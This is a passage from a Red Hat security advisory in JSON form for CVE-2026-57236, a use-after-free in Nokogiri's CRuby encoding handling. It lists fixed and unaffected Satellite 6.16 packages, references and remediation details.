"text": "nokogiri: Nokogiri: Denial of Service or Information Disclosure via invalid encoding handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has an Important impact as Nokogiri\u0027s CRuby implementation in Red Hat products is vulnerable to a use-after-free when processing invalid encoding values. A remote unauthenticated attacker can trigger a segmentation fault causing denial of service, or leak freed memory contents into a Ruby String causing information disclosure, by providing crafted input that causes an invalid encoding to be set on a document.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-57236"
},
{
"category": "external",
"summary": "RHBZ#2492952",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492952"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-57236",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-57236"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-57236",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57236"
},
{
"category": "external",
"summary": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5v8h-3h3q-446p",
"url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-5v8h-3h3q-446p"
}
],
"release_date": "2026-06-25T14:29:14.181000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
